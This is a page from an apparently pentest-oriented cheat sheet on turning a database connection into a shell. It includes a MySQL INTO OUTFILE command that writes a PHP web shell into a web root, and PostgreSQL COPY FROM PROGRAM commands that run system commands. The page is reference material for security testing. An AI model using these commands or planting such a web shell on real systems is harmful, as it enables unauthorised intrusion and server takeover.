Leet Sheet
  • Leet Sheet
  • TODO
  • Reconnaissance
    • Automated Reconnaissance
    • Domains
    • Scour the Web
    • Metadata
  • Web App Hacking
    • Enumeration
      • Webserver Virtualhost Subdomains
      • Common Identifiers
      • Web Fuzzing
      • Directory Enumeration
        • Automated Directory Enumeration
        • Manual Directory Enumeration
      • Automated Web Technology Detection
    • User Attacks
      • CORS Misconfigurations
      • DNS Rebinding
      • Open Redirect
      • Clickjacking
      • Cross Site Request Forgery (CSRF)
      • Session Fixation
      • XSS/Cross Site Scripting
      • CSS Injection
      • HTML Injection
      • Phishing
    • Database Attacks
      • SQL Injection
      • Get a Shell From DB Connection
    • Server Attacks
      • Collisions
      • Server Side Request Forgery
        • Redis SSRF
      • Insecure Direct Object Reference
      • Timing-Based Side-Channel Attacks
      • Attacking Authentication Methods
        • JWT Attacks
        • Brute Forcing Web Forms
      • Loose Comparisons
      • Unrestricted File Upload
      • Insecure Deserialization
      • Command Injection
      • Path Traversal
      • File Inclusion
      • Server-Side Template Injection
      • XML External Entities Injection (XXE)
      • Server Misconfigurations
      • Parser Inconsistencies
      • Bypassing WAFs
    • DNS Attacks
    • Cloud Attacks
      • Amazon Web Services
    • Interesting Outdated Attacks
      • SQL Truncation
  • Network Hacking
    • General Enumeration
    • RPC
    • LDAP
    • SMB
    • SNMP
    • WMI
    • SSH
    • Kerberos
    • NTLM
    • Man-In-the-Middle (MITM)
    • WinRM
  • Post Exploitation
    • Windows
      • CLI Tips
      • Shells
      • Windows Script Host
      • Windows Privilege Escalation
        • Enumeration
        • JuicyPotato/RottenPotato
        • Kernel Exploits
        • Unquoted Service Paths
      • Active Directory
      • Dumping Passwords
      • NTLM Hash Theft
    • Linux
      • Port Forwarding
      • Shells
      • Linux Privilege Escalation
        • Enumeration
        • SUID Bit
        • Dot (.) In PATH
        • Escape From Restricted Shell
        • Symlink Trickery
        • Wildcard Injection
        • Docker group/LXD group
        • Password Reuse
      • Backdoors
    • Docker Container
    • General
  • Various
    • CVEs
    • SSH Agent Hijacking
    • Password Cracking
    • Cryptography
    • Non-Hacking
    • Malware
    • Forensics
      • Reading Keystrokes from USB PCAP Data
  • Binary Exploitation
    • Resources
    • Base Knowledge
    • Format String Exploits
    • Stack Smashing
    • Heap Exploits
    • Time-of-Check to Time-of-Use (TOCTOU)
    • Shellcode
    • Decompilation
    • Debugging
    • Exploit Mitigations and Protections
    • Exploit Protection Bypassing
    • Passing Input
    • Fuzzing
    • Automatic Exploitation
  • Physical Security
    • Mechanical Locks
    • Electronic Locks
    • Other Attacks
    • Destructive Entry
    • Elevator Attacks
  • Social Engineering
    • Phishing
Powered by GitBook
On this page
  • Write a Web Shell
  • Databases Support Command Execution
  • PostgreSQL Intended Command Execution
  • PostgreSQL Command Execution Using Extensions

Was this helpful?

  1. Web App Hacking
  2. Database Attacks

Get a Shell From DB Connection

You have a connection to a database. How can you get a shell from that?

Write a Web Shell

Prerequisites:

  • A web server that supports PHP or ASP is installed on the same server

  • The database user has write permissions in a directory from where PHP or ASP can be executed through the web server

Many databases can write files to the local system. So if possible, write a web shell to the web server.

Mysql example:

select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

Databases Support Command Execution

Some databases support command execution, so you can just use that. Always check whether the database system supports running commands, or whether there are CVEs or methods for running shell commands for that specific DB.

Prerequisite:

  • Connection to a database system that supports command execution

  • May require certain privileges as the user you're connecting to

PostgreSQL Intended Command Execution

Prerequisites:

  • Heightened privileges:

    • Database superuser

    • Or any user in the pg_execute_server_program group

First, the attacker needs to create a table to hold the system command's output.

> CREATE TABLE cmd_exec(cmd_output text);

Then, they can run the system command via the COPY TO/FROM PROGRAM function.

> COPY cmd_exec FROM PROGRAM 'id';

Run longer commands like this:

> COPY cmd_exec FROM PROGRAM 'touch /tmp/test';

PostgreSQL Command Execution Using Extensions

Prerequisites:

  • In older versions (9.x, 8.x), the DB user must have permissions to write to the /tmp directory, and have permissions to source UDF Shared Libraries from there as well.

  • In newer versions (>=11, perhaps?), also requires superadmin privileges

Method:

PreviousSQL InjectionNextServer Attacks

Last updated 3 years ago

Was this helpful?

With postgres 8.x, use the

With 9.x, you'll have to

metasploit module
compile the library
RCE with PostgreSQL ExtensionsHackTricks
Logo